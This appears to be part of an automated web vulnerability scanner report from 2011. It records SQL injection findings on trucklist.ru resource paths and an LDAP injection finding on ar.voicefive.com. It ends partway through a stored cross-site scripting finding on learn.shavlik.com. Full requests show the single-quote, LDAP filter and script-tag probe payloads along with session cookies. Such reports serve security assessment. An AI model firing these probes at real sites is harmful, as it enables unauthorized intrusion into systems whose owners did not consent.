Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:09 GMT
Content-Length: 6644

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.15. http://www.trucklist.ru/webroot/delivery/js/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/jquery.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:28 GMT
Content-Length: 6630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:54 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.16. http://www.trucklist.ru/webroot/delivery/js/jquery.json.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.json.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/jquery.json.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:46:36 GMT
Content-Length: 6640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/jquery.json.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:02 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.17. http://www.trucklist.ru/webroot/delivery/js/prototype.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/prototype.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/prototype.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:54:16 GMT
Content-Length: 6636

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/prototype.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:54:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:49 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.18. http://www.trucklist.ru/webroot/delivery/js/scripts.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/scripts.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /webroot/delivery/js/scripts.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:34 GMT
Content-Length: 6632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/scripts.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:36 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.19. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/javascripts/window.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/javascripts/window.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:51:14 GMT
Content-Length: 6670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.20. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/alert.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/alert.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:38 GMT
Content-Length: 6660

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.21. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/alphacube.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/alphacube.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:44 GMT
Content-Length: 6668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.22. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/windows/themes/default.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/themes/default.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Content-Length: 6664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2a0e35b7bd3690da)(sn=* and 2a0e35b7bd3690da)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da&#41;&#40;sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)!(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da&#41;!&#40;sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 744fd--><script>alert(1)</script>aa703b77027 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=0744fd--><script>alert(1)</script>aa703b77027&hp=372 HTTP/1.1
Host: learn.shavlik.com
